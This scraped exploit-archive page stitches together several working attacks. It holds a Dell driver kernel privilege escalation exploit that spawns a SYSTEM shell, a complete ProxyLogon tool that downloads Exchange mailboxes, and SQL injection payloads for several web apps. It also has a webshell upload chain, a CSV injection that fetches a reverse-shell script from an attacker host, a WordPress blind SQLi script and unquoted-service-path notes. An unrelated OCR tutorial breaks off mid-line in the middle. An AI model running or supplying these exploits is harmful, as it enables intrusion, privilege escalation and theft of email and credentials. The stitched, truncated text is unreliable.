# Exploit Title: DELL dbutil_2_3.sys 2.3 - Arbitrary Write to Local Privilege Escalation (LPE) # Date: 10/05/2021 # Exploit Author: Paolo Stagno aka VoidSec # Version: <= 2.3 # CVE: CVE-2021-21551 # Tested on: Windows 10 Pro x64 v.1903 Build 18362.30 # Blog: https://voidsec.com/reverse-engineering-and-exploiting-dell-cve-2021-21551/ #include <iostream> #include <windows.h> #include <winternl.h> #include <tlhelp32.h> #include <algorithm> #define IOCTL_CODE 0x9B0C1EC8 // IOCTL_CODE value, used to reach the vulnerable function (taken from IDA) #define SystemHandleInformation 0x10 #define SystemHandleInformationSize 1024 * 1024 * 2 // define the buffer structure which will be sent to the vulnerable driver typedef struct Exploit { uint64_t Field1; // "padding" can be anything void* Field2; // where to write uint64_t Field3; // must be 0 uint64_t Field4; // value to write }; typedef struct outBuffer { uint64_t Field1; uint64_t Field2; uint64_t Field3; uint64_t Field4; }; // define a pointer to the native function 'NtQuerySystemInformation' using pNtQuerySystemInformation = NTSTATUS(WINAPI*)( ULONG SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); // define the SYSTEM_HANDLE_TABLE_ENTRY_INFO structure typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO { USHORT UniqueProcessId; USHORT CreatorBackTraceIndex; UCHAR ObjectTypeIndex; UCHAR HandleAttributes; USHORT HandleValue; PVOID Object; ULONG GrantedAccess; } SYSTEM_HANDLE_TABLE_ENTRY_INFO, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO; // define the SYSTEM_HANDLE_INFORMATION structure typedef struct _SYSTEM_HANDLE_INFORMATION { ULONG NumberOfHandles; SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1]; } SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION; int main(int argc, char** argv) { // open a handle to the device exposed by the driver - symlink is \\.\\DBUtil_2_3 HANDLE device = ::CreateFileW( L"\\\\.\\DBUtil_2_3", GENERIC_WRITE | GENERIC_READ, NULL, nullptr, OPEN_EXISTING, NULL, NULL); if (device == INVALID_HANDLE_VALUE) { std::cout << "[!] Couldn't open handle to DBUtil_2_3 driver. Error code: " << ::GetLastError() << std::endl; return -1; } std::cout << "[+] Opened a handle to DBUtil_2_3 driver!\n"; // resolve the address of NtQuerySystemInformation and assign it to a function pointer pNtQuerySystemInformation NtQuerySystemInformation = (pNtQuerySystemInformation)::GetProcAddress(::LoadLibraryW(L"ntdll"), "NtQuerySystemInformation"); if (!NtQuerySystemInformation) { std::cout << "[!] Couldn't resolve NtQuerySystemInformation API. Error code: " << ::GetLastError() << std::endl; return -1; } std::cout << "[+] Resolved NtQuerySystemInformation!\n"; // open the current process token - it will be used to retrieve its kernelspace address later HANDLE currentProcess = ::GetCurrentProcess(); HANDLE currentToken = NULL; bool success = ::OpenProcessToken(currentProcess, TOKEN_ALL_ACCESS, &currentToken); if (!success) { std::cout << "[!] Couldn't open handle to the current process token. Error code: " << ::GetLastError() << std::endl; return -1; } std::cout << "[+] Opened a handle to the current process token!\n"; // allocate space in the heap for the handle table information which will be filled by the call to 'NtQuerySystemInformation' API PSYSTEM_HANDLE_INFORMATION handleTableInformation = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(::GetProcessHeap(), HEAP_ZERO_MEMORY, SystemHandleInformationSize); // call NtQuerySystemInformation and fill the handleTableInformation structure ULONG returnLength = 0; NtQuerySystemInformation(SystemHandleInformation, handleTableInformation, SystemHandleInformationSize, &returnLength); uint64_t tokenAddress = 0; // iterate over the system's handle table and look for the handles beloging to our process for (int i = 0; i < handleTableInformation->NumberOfHandles; i++) { SYSTEM_HANDLE_TABLE_ENTRY_INFO handleInfo = (SYSTEM_HANDLE_TABLE_ENTRY_INFO)handleTableInformation->Handles[i]; // if it finds our process and the handle matches the current token handle we already opened, print it if (handleInfo.UniqueProcessId == ::GetCurrentProcessId() && handleInfo.HandleValue == (USHORT)currentToken) { tokenAddress = (uint64_t)handleInfo.Object; std::cout << "[+] Current token address in kernelspace is at: 0x" << std::hex << tokenAddress << std::endl; } } outBuffer buffer = { 0, 0, 0, 0 }; /* dt nt!_SEP_TOKEN_PRIVILEGES +0x000 Present : Uint8B +0x008 Enabled : Uint8B +0x010 EnabledByDefault : Uint8B We've added +1 to the offsets to ensure that the low bytes part are 0xff. */ // overwrite the _SEP_TOKEN_PRIVILEGES "Present" field in the current process token Exploit exploit = { 0x4141414142424242, (void*)(tokenAddress + 0x40), 0x0000000000000000, 0xffffffffffffffff }; // overwrite the _SEP_TOKEN_PRIVILEGES "Enabled" field in the current process token Exploit exploit2 = { 0x4141414142424242, (void*)(tokenAddress + 0x48), 0x0000000000000000, 0xffffffffffffffff }; // overwrite the _SEP_TOKEN_PRIVILEGES "EnabledByDefault" field in the current process token Exploit exploit3 = { 0x4141414142424242, (void*)(tokenAddress + 0x50), 0x0000000000000000, 0xffffffffffffffff }; DWORD bytesReturned = 0; success = DeviceIoControl( device, IOCTL_CODE, &exploit, sizeof(exploit), &buffer, sizeof(buffer), &bytesReturned, nullptr); if (!success) { std::cout << "[!] Couldn't overwrite current token 'Present' field. Error code: " << ::GetLastError() << std::endl; return -1; } std::cout << "[+] Successfully overwritten current token 'Present' field!\n"; success = DeviceIoControl( device, IOCTL_CODE, &exploit2, sizeof(exploit2), &buffer, sizeof(buffer), &bytesReturned, nullptr); if (!success) { std::cout << "[!] Couldn't overwrite current token 'Enabled' field. Error code: " << ::GetLastError() << std::endl; return -1; } std::cout << "[+] Successfully overwritten current token 'Enabled' field!\n"; success = DeviceIoControl( device, IOCTL_CODE, &exploit3, sizeof(exploit3), &buffer, sizeof(buffer), &bytesReturned, nullptr); if (!success) { std::cout << "[!] Couldn't overwrite current token 'EnabledByDefault' field. Error code:" << ::GetLastError() << std::endl; return -1; } std::cout << "[+] Successfully overwritten current token 'EnabledByDefault' field!\n"; std::cout << "[+] Token privileges successfully overwritten!\n"; std::cout << "[+] Spawning a new shell with full privileges!\n"; system("cmd.exe"); return 0; }
HireHackking

Title: Python + Baidu OCR for image recognition

HACKER · %s · %s

To be honest, Pyhon is really awesome in data processing. Especially today with big data, we are inseparable from all kinds of data. This article introduces the use of Baidu OCR for text recognition.
Experimental Environment
Python (3.9.12) Kali Linux Baidu OCR
Apply for Baidu OCR
Visit Baidu Smart Cloud and activate API
Website: https://cloud.baidu.com/campaign/OCR202203/index.html
You can log in with your Baidu account. The advantage of using Baidu login is that you can directly migrate Baidu's real-name authentication, so you don't need to wait a few more days for manual review.
You can choose to try it for free, or buy it for 10,000 times for 1 yuan. I think there is no difference, it is all enough.
When you receive the free credit, you must check the interface type, otherwise it will be blank.
Create a new application and get token
Click Create App in the Console-Text Recognition-Overview
Select an individual for the application, and fill in the application name and overview at will
After the creation is completed, enter the application list and you can see the API Key and Secret Key, and write it down.
Text Recognition
According to the official example, a simple column of Python was written. References are as follows:
from aip import AipOcr
APP_ID='
HireHackking
# Exploit Title: Billing Management System 2.0 - Union based SQL injection (Authenticated) # Date: 2021-05-16 # Exploit Author: Mohammad Koochaki # Vendor Homepage: https://www.sourcecodester.com/php/14380/billing-management-system-php-mysql-updated.html # Software Link: https://www.sourcecodester.com/download-code?nid=14380&title=Billing+Management+System+in+PHP%2FMySQLi+with+Source+Code # Version: 2.0 # This web application contains several SQL injection vulnerabilities in the following paths: - http://localhost/editgroup.php?id=1 - http://localhost/edituser.php?id=1 - http://localhost/editcategory.php?id=10 - http://localhost/editproduct.php?id=1 - http://localhost/editsales.php?id=1 # PoC (editgroup.php): - Vulnerable code: $sql="SELECT * from user_groups where delete_status='0' and id='".$_GET['id']." '"; - Payload: http://localhost/editgroup.php?id=-1%27%20union%20select%201,group_concat(username,0x3a,password),3,4,5%20from%20users--+
HireHackking
# Exploit Title: Printable Staff ID Card Creator System 1.0 - SQLi & RCE via Arbitrary File Upload # Date: 2021-05-16 # Exploit Author : bwnz # Software Link: https://www.sourcecodester.com/php/12802/php-staff-id-card-creation-and-printing-system.html # Version: 1.0 # Tested on: Ubuntu 20.04.2 LTS # Printable Staff ID Card Creator System is vulnerable to an unauthenticated SQL Injection attack. # After compromising the database via SQLi, an attacker can log in and leverage an arbitrary file upload # vulnerability to obtain remote code execution. -----SQL Injection----- Step 1.) Navigate to the login page and populate the email and password fields. Step 2.) With Burp Suite running, send and capture the request. Step 3.) Within Burp Suite, right click and "Save item" in preparation for putting the request through SQLMap. Step 4.) Open a terminal and run the following command: sqlmap -r <saved item> Below are the SQLMap results Parameter: user_email (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: user_email=test@test.com' RLIKE (SELECT (CASE WHEN (9007=9007) THEN 0x7465737440746573742e636f6d ELSE 0x28 END))-- JaaE&password=`&login_button= Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: user_email=test@test.com' AND (SELECT 7267 FROM(SELECT COUNT(*),CONCAT(0x7176717071,(SELECT (ELT(7267=7267,1))),0x7162716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- pCej&password=`&login_button= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: user_email=test@test.com' AND (SELECT 2884 FROM (SELECT(SLEEP(5)))KezZ)-- bBqz&password=`&login_button= ----- END ----- ----- Authenticated RCE via Arbitrary File Upload ----- # For this attack, it is assumed that you've obtained credentials via the SQL Injection attack above and have logged in. Step 1.) After logging in, click the "Initialization" option and "Add System Info". Step 2.) Populate the blank form with arbitrary data. At the bottom of the form, there is an option to upload a logo. Upload your evil.php file here and click "Finish". Step 3.) By default, the file is uploaded to http://<IP>/Staff_registration/media/evil.php. Navigate to it for RCE. ----- END ------
HireHackking

Microsoft Exchange 2019 - Unauthenticated Email Download

HACKER · %s · %s

# Exploit Title: Microsoft Exchange 2019 - Unauthenticated Email Download # Date: 03-11-2021 # Exploit Author: Gonzalo Villegas a.k.a Cl34r # Vendor Homepage: https://www.microsoft.com/ # Version: OWA Exchange 2013 - 2019 # Tested on: OWA 2016 # CVE : CVE-2021-26855 # Details: checking users mailboxes and automated downloads of emails import requests import argparse import time from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) __proxies__ = {"http": "http://127.0.0.1:8080", "https": "https://127.0.0.1:8080"} # for debug on proxy # needs to specifies mailbox, will return folder Id if account exists payload_get_folder_id = """<?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <m:GetFolder> <m:FolderShape> <t:BaseShape>AllProperties</t:BaseShape> </m:FolderShape> <m:FolderIds> <t:DistinguishedFolderId Id="inbox"> <t:Mailbox> <t:EmailAddress>{}</t:EmailAddress> </t:Mailbox> </t:DistinguishedFolderId> </m:FolderIds> </m:GetFolder> </soap:Body> </soap:Envelope> """ # needs to specifies Folder Id and ChangeKey, will return a list of messages Ids (emails) payload_get_items_id_folder = """<?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <m:FindItem Traversal="Shallow"> <m:ItemShape> <BaseShape>AllProperties</BaseShape></m:ItemShape> <SortOrder/> <m:ParentFolderIds> <t:FolderId Id="{}" ChangeKey="{}"/> </m:ParentFolderIds> <QueryString/> </m:FindItem> </soap:Body> </soap:Envelope> """ # needs to specifies Id (message Id) and ChangeKey (of message too), will return an email from mailbox payload_get_mail = """<?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <GetItem xmlns="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" Traversal="Shallow"> <ItemShape> <t:BaseShape>Default</t:BaseShape> </ItemShape> <ItemIds> <t:ItemId Id="{}" ChangeKey="{}"/> </ItemIds> </GetItem> </soap:Body> </soap:Envelope> """ def getFQDN(url): print("[*] Getting FQDN from headers") rs = requests.post(url + "/owa/auth.owa", verify=False, data="evildata") if "X-FEServer" in rs.headers: return rs.headers["X-FEServer"] else: print("[-] Can't get FQDN ") exit(0) def extractEmail(url, uri, user, fqdn, content_folderid, path): headers = {"Cookie": "X-BEResource={}/EWS/Exchange.asmx?a=~1942062522".format(fqdn), "Content-Type": "text/xml", "User-Agent": "Mozilla pwner"} from xml.etree import ElementTree as ET dom = ET.fromstring(content_folderid) for p in dom.findall('.//{http://schemas.microsoft.com/exchange/services/2006/types}Folder'): id_folder = p[0].attrib.get("Id") change_key_folder = p[0].attrib.get("ChangeKey") data = payload_get_items_id_folder.format(id_folder, change_key_folder) random_uris = ["auth.js", "favicon.ico", "ssq.js", "ey37sj.js"] rs = requests.post(url + uri, data=data, headers=headers, verify=False) if "ErrorAccessDenied" in rs.text: print("[*] Denied ;(.. retrying") t_uri = uri.split("/")[-1] for ru in random_uris: print("[*] Retrying with {}".format(uri.replace(t_uri, ru))) rs = requests.post(url + uri.replace(t_uri, ru), data=data, headers=headers, verify=False) if "NoError" in rs.text: print("[+] data found, dowloading email") break print("[+]Getting mails...") dom_messages = ET.fromstring(rs.text) messages = dom_messages.find('.//{http://schemas.microsoft.com/exchange/services/2006/types}Items') for m in messages: id_message = m[0].attrib.get("Id") change_key_message = m[0].attrib.get("ChangeKey") data = payload_get_mail.format(id_message, change_key_message) random_uris = ["auth.js", "favicon.ico", "ssq.js", "ey37sj.js"] rs = requests.post(url + uri, data=data, headers=headers, verify=False) if "ErrorAccessDenied" in rs.text: print("[*] Denied ;(.. retrying") t_uri = uri.split("/")[-1] for ru in random_uris: print("[*] Retrying with {}".format(uri.replace(t_uri, ru))) rs = requests.post(url + uri.replace(t_uri, ru), data=data, headers=headers, verify=False) if "NoError" in rs.text: print("[+] data found, downloading email") break try: f = open(path + "/" + user.replace("@", "_").replace(".", "_")+"_"+change_key_message.replace("/", "").replace("\\", "")+".xml", 'w+') f.write(rs.text) f.close() except Exception as e: print("[!] Can't write .xml file to path (email): ", e) def checkURI(url, fqdn): headers = {"Cookie": "X-BEResource={}/EWS/Exchange.asmx?a=~1942062522".format(fqdn), "Content-Type": "text/xml", "User-Agent": "Mozilla hehe"} arr_uri = ["//ecp/xxx.js", "/ecp/favicon.ico", "/ecp/auth.js"] for uri in arr_uri: rs = requests.post(url + uri, verify=False, data=payload_get_folder_id.format("thisisnotanvalidmail@pwn.local"), headers=headers) #print(rs.content) if rs.status_code == 200 and "MessageText" in rs.text: print("[+] Valid URI:", uri) calculated_domain = rs.headers["X-CalculatedBETarget"].split(".") if calculated_domain[-2] in ("com", "gov", "gob", "edu", "org"): calculated_domain = calculated_domain[-3] + "." + calculated_domain[-2] + "." + calculated_domain[-1] else: calculated_domain = calculated_domain[-2] + "." + calculated_domain[-1] return uri, calculated_domain #time.sleep(1) print("[-] No valid URI found ;(") exit(0) def checkEmailBoxes(url, uri, user, fqdn, path): headers = {"Cookie": "X-BEResource={}/EWS/Exchange.asmx?a=~1942062522".format(fqdn), "Content-Type": "text/xml", "User-Agent": "Mozilla hehe"} rs = requests.post(url + uri, verify=False, data=payload_get_folder_id.format(user), headers=headers) #time.sleep(1) #print(rs.content) if "ResponseCode" in rs.text and "ErrorAccessDenied" in rs.text: print("[*] Valid Email: {} ...but not authenticated ;( maybe not vulnerable".format(user)) if "ResponseCode" in rs.text and "NoError" in rs.text: print("[+] Valid Email Found!: {}".format(user)) extractEmail(url, uri, user, fqdn, rs.text, path) if "ResponseCode" in rs.text and "ErrorNonExistentMailbox" in rs.text: print("[-] Not Valid Email: {}".format(user)) def main(): __URL__ = None __FQDN__ = None __mailbox_domain__ = None __path__ = None print("[***** OhhWAA *****]") parser = argparse.ArgumentParser(usage="Basic usage python %(prog)s -u <url> -l <users.txt> -p <path>") parser.add_argument('-u', "--url", help="Url, provide schema and not final / (eg https://example.org)", required=True) parser.add_argument('-l', "--list", help="Users mailbox list", required=True) parser.add_argument("-p", "--path", help="Path to write emails in xml format", required=True) parser.add_argument('-f', "--fqdn", help="FQDN", required=False, default=None) parser.add_argument("-d", "--domain", help="Domain to check mailboxes (eg if .local dont work)", required=False, default=None) args = parser.parse_args() __URL__ = args.url __FQDN__ = args.fqdn __mailbox_domain__ = args.domain __list_users__ = args.list __valid_users__ = [] __path__ = args.path if not __FQDN__: __FQDN__ = getFQDN(__URL__) print("[+] Got FQDN:", __FQDN__) valid_uri, calculated_domain = checkURI(__URL__, __FQDN__) if not __mailbox_domain__: __mailbox_domain__ = calculated_domain list_users = open(__list_users__, "r") for user in list_users: checkEmailBoxes(__URL__, valid_uri, user.strip()+"@"+__mailbox_domain__, __FQDN__, __path__) print("[!!!] FINISHED OhhWAA") if __name__ == '__main__': main()
HireHackking

Visual Studio Code 1.47.1 - Denial of Service (PoC)

HACKER · %s · %s

# Exploit Tittle: Visual Studio Code 1.47.1 - Denial of Service (Poc) # Exploit Author: H.H.A.Ravindu Priyankara # Category: Denial of Service(DOS) # Tested Version:1.47.1 # Vendor: Microsoft # Software Download Link:https://code.visualstudio.com/updates/ Write-Host " * * *-------------------------------------------------------------------------------------------------------* | | |" -ForegroundColor Yellow -NoNewline; Write-Host " Exploit Tittle :-" -ForegroundColor Green -NoNewline; Write-Host " Visual Studio Code (VS Code) Denial of Service " -ForegroundColor Cyan -NoNewline; Write-Host " | | | |" -ForegroundColor Yellow -NoNewline; Write-Host " Author :-" -ForegroundColor Green -NoNewline; Write-Host " H.H.A.Ravindu.Priyankara " -ForegroundColor Cyan -NoNewline; Write-Host " | | | |" -ForegroundColor Yellow -NoNewline; Write-Host " Github :-" -ForegroundColor Green -NoNewline; Write-Host " https://github.com/Ravindu-Priyankara " -ForegroundColor Cyan -NoNewline; Write-Host " | | | |" -ForegroundColor Yellow -NoNewline; Write-Host " Youtube :-"-ForegroundColor Green -NoNewline; Write-Host " https://www.youtube.com/channel/UCKD2j5Mbr15RKaXBSIXwvMQ " -ForegroundColor Cyan -NoNewline; Write-Host " | | | |" -ForegroundColor Yellow -NoNewline; Write-Host " Linkedin :-"-ForegroundColor Green -NoNewline; Write-Host " https://www.linkedin.com/in/ravindu-priyankara-b77753209/ " -ForegroundColor Cyan -NoNewline; Write-Host " | *-------------------------------------------------------------------------------------------------------*"-ForegroundColor Yellow [string]$Userinpts = Read-Host -Prompt "Enter Run or Stop:-" if ($Userinpts -eq "Run") { Write-Output "Yeah I Know" while ($True) { $name = "AAAAAAA" $name * 1000000 } #or #$name = "AAAAAAA" #$name * 1000000 } if ($Userinpts -eq "Stop") { exit } #========================================================== #==================== solution ============================ #========================================================== #Update Your Visual Studio Code Application # 1.47.1 version ==> 1.56.0 version #==========================================================
HireHackking

In4Suit ERP 3.2.74.1370 - 'txtLoginId' SQL injection

HACKER · %s · %s

# Exploit Title: In4Suit ERP 3.2.74.1370 - 'txtLoginId' SQL injection # Date: 18/05/2021 # Exploit Author: Gulab Mondal # Vendor Homepage: https://www.in4velocity.com/in4suite-erp.html # Version: In4Suite ERP 3.2.74.1370 # Tested on: Windows # CVE: CVE-2021-27828 ----------------------------------------- SQL injection in In4Suite ERP 3.2.74.1370 allows remote attackers to modify or delete data, causing persistent changes to the application's content or behavior by using malicious SQL queries. -------------- # Error condition POST /CheckLogin.asp HTTP/1.1 Host: 127.0.0.1 txtLoginId=admin&txtpassword=test&cmbLogin=Login&hdnPwdEncrypt=" " # SQL Injection exploitation POST /CheckLogin.asp HTTP/1.1 Host: 127.0.0.1 txtLoginId=admin OR '1=1&txtpassword=test&cmbLogin=Login&hdnPwdEncrypt=" ------------------------------
HireHackking

ManageEngine ADSelfService Plus 6.1 - CSV Injection

HACKER · %s · %s

# Exploit Title: ManageEngine ADSelfService Plus 6.1 - CSV Injection # Date: 19/05/2021 # Exploit Author: Metin Yunus Kandemir # Vendor Homepage: https://www.manageengine.com/ # Software Link: https://www.manageengine.com/products/self-service-password/download.html # Version: 6.1 # Description: https://docs.unsafe-inline.com/0day/manageengine-adselfservice-plus-6.1-csv-injection import requests import sys import urllib3 """ Proof of Concept: Step-1 1- Malicious user sends POST request to login page https://TARGET-IP/j_security_check and sets j_username parameter as like the below. =cmd|'/C powershell.exe -c iex (New-Object Net.WebClient).DownloadString('http://ATTACKER-IP/Invoke-PowerShellTcp.ps1')'!A0 Step-2 2- The request attempt will be saved to"User Attempts Audit Report" table that is under the Reports > Audit Reports section. Url: https://TARGET-IP/webclient/index.html#/reports/listReports/12 j_username parameter value is saved to "User Name" column which is start of line in the CSV file. If admin user exports this table as CSV file and confirms the alert popup, reverse shell connection will be obtained by malicious user. Details: https://docs.unsafe-inline.com/0day/manageengine-adselfservice-plus-6.1-csv-injection """ def loginReq(target,payload,getCsrf): s = requests.Session() data = { "j_username": payload, "j_password": "joker", "domainName": "ADSelfService+Plus+Authentication", "AUTHRULE_NAME": "ADAuthenticator", "adscsrf": getCsrf } url = "https://"+target+"/j_security_check" req = s.post(url, data=data, allow_redirects=False, verify=False) if req.status_code == 302: print("[+] Sending request is successful.") print("[+] Injected payload: %s" %payload) else: print("[-] Something went wrong!") print(req.status_code) def getCsrfToken(target, payload=None): urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) gUrl = "https://" + target + "/authorization.do" getCsrf = requests.get(url=gUrl, allow_redirects=False, verify=False) print("[*] Csrf token: %s" %getCsrf.cookies['_zcsr_tmp']) loginReq(target,payload,getCsrf) def main(args): if len(args) != 3: print("usage: %s targetIp:port payload" %(args[0])) print("Example: python3 adSelfServiceCsv.py 192.168.1.253:9251 \"=cmd|'/C powershell.exe -c iex (New-Object Net.WebClient).DownloadString('http://ATTACKER-IP/Invoke-PowerShellTcp.ps1')'!A0\"") sys.exit(1) getCsrfToken(target=args[1], payload=args[2]) if __name__ == "__main__": main(args=sys.argv)
HireHackking
# Exploit Title: ASUS HID Access Service 1.0.94.0 - 'AsHidSrv.exe' Unquoted Service Path # Date: 2020-05-19 # Exploit Author: Alejandra Sánchez # Vendor Homepage: www.asus.com # Version: 1.0.94.0 # Tested on: Windows 10 Pro x64 es # Description: ATK Hotkey 1.0.94.0 suffers from an unquoted search path issue impacting the service 'AsHidService'. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user’s code would execute with the elevated privileges of the application. # Prerequisites Local, Non-privileged Local User with restart capabilities # Details C:\>wmic service get name, pathname, displayname, startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ ASUS HID Access Service AsHidService C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\AsHidSrv.exe Auto C:\>sc qc "AsHidService" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: AsHidService TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\AsHidSrv.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : ASUS HID Access Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem
HireHackking
# Exploit Title: Acer Updater Service 1.2.3500.0 - 'UpdaterService.exe' Unquoted Service Path # Discovery by: Emmanuel Lujan # Discovery Date: 2020-11-26 # Vendor Homepage: https://www.acer.com/ac/en/US/content/home # Tested Version: 1.2.3500.0 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 7 Home Premium x64 # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ Live Updater Service Live Upd ater Service C:\Program Files\Acer\Acer Updater\Updater Service.exe Auto # Service info: C:\>sc qc "Live Updater Service" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: Live updater Service TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Acer\Acer Updater\UpdaterService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Live Updater Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
HireHackking
# Exploit Title: WordPress Plugin WP Statistics 13.0.7 - Time-Based Blind SQL Injection (Unauthenticated) # Date: 20/05/2021 # Exploit Author: Mansoor R (@time4ster) # CVSS Score: 7.5 (High) # CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N # Version Affected: 13.0 to 13.0.7 # Vendor URL: https://wordpress.org/plugins/wp-statistics/ # Patch: Upgrade to wp-statistics 13.0.8 (or above) # Tested On: wp-statistics 13.0.6,13.0.7 #!/bin/bash # Credits: # https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/ # SQLmap Exploit for grepping database banner (automated): # sqlmap -u "http://192.168.1.54/wordpress/wp-admin/admin.php?ID=1&page=wps_pages_page&type=1" --techniqu=T --dbms="mysql" -p "ID" -b # WARNINGS: # Only test the exploit on websites you are authorized to. # The exploit will perform sleep for 3 seconds. Don't use on production server of organization without prior permissions. # Exploit # ============== echo echo "============================================================================================" echo "Unauthenticated Time-Based Blind SQL Injection in WP Statistics < 13.0.8" echo echo "By: Mansoor R (@time4ster)" echo "============================================================================================" echo function printHelp() { echo -e " Usage: -u|--wp-url <string> Wordpress target url -k|--check Only checks whether vulnerable version of plugin is running or not. -h|--help Print Help menu Example: ./wp-statistics-exploit.sh --wp_url https://www.example.com/wordpress ./wp-statistics-exploit.sh --wp_url https://www.example.com/wordpress --check " } #Processing arguments check="false" exploit="true" while [[ "$#" -gt 0 ]] do key="$1" case "$key" in -u|--wp-url) wp_url="$2" shift shift # past argument ;; -k|--check) check="true" exploit="false" shift shift ;; -h|--help) printHelp exit shift ;; *) echo [-] Enter valid options exit ;; esac done [[ -z "$wp_url" ]] && echo "[-] Supply wordpress target URL. Use -h for help menu." && exit function checkVersion() { url="$1" [[ -z "$url" ]] && return target_endpoint="$url/wp-content/plugins/wp-statistics/readme.txt" user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36" version=$(curl -ks --max-time 5 --user-agent "$user_agent" "$target_endpoint" | grep -i -m 1 "stable tag:" | grep -o -E "[0-9]+\.[0-9]+\.[0-9]+") [[ -n "$version" ]] && echo "[+] WP-statistical Plugin Version: $version" [[ -z "$version" ]] && echo "[-] WP-statistical Unable to detect version." && return vuln_version=(13.0.7 13.0.6 13.0.5 13.0.4 13.0.3 13.0.1 13.0) is_vulnerable="false" for v in "${vuln_version[@]}";do [[ "$version" == "$v" ]] && is_vulnerable="true" && break done [[ "$is_vulnerable" == "true" ]] && echo "[++] Target $url is Vulnerable" [[ "$is_vulnerable" == "false" ]] && echo "[--] Target $url is Not Vulnerable" } function exploitPlugin() { url="$1" target_endpoint="$url/wp-admin/admin.php" user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36" sleep=3 payload="ID=1 AND (SELECT * from (select SLEEP($sleep))a)" echo -e -n "[!] Caution: You are going to execute sleep database command for $sleep seconds. Proceed only if you have permission.\nPress (Y/y) to continue or any other key to exit: " read choice [[ "$choice" != "y" ]] && [[ "$choice" != "Y" ]] && return echo echo "[+] Trying Payload:" set -x curl -v -ks -G --user-agent "$user_agent" "$target_endpoint" \ --data-urlencode "page=wps_pages_page" \ --data-urlencode "type=1" \ --data-urlencode "$payload" } [[ "$check" == "true" ]] && checkVersion "$wp_url" [[ "$exploit" == "true" ]] && exploitPlugin "$wp_url"